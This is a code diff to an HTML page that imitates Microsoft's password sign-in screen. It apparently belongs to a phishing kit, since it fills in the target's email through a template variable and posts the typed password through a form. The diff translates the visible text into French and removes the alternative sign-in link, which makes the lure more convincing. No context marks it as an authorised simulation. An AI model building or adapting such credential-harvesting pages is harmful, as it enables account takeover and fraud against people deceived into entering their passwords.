--- a/microsoft-login/index2.html
+++ b/microsoft-login/index2.html
@@ -18,21 +18,21 @@
                 </button>
                 <span id="user_identity">{{.Email}}</span>
             </div>
-            <h2 class="title mb-16">Enter password</h2>
+            <h2 class="title mb-16">Entrez le mot de passe</h2>
             <form id="signin_form" method="POST"> <!-- Ajout de l'attribut id au formulaire -->
                 <div class="mb-16">
                     <p id="error_pwd" class="error"></p>
-                    <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
+                    <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Mot de passe" />
                 </div>
             </form>
             <div>
-                <p class="mb-16"> <a href="#" class="link fs-13">Forgot password?</a></p>
+                <p class="mb-16"> <a href="#" class="link fs-13">Mot de passe oublié ?</a></p>
                 <p class="mb-16">
-                    <a href="#" class="link fs-13">Other ways to sign in</a>
+                    
                 </p>
             </div>
             <div>
-                <button class="btn" id="btn_next" type="submit">Sign in</button>
+                <button class="btn" id="btn_next" type="submit">Se connecter</button>
             </div>
         </div>
     </section>
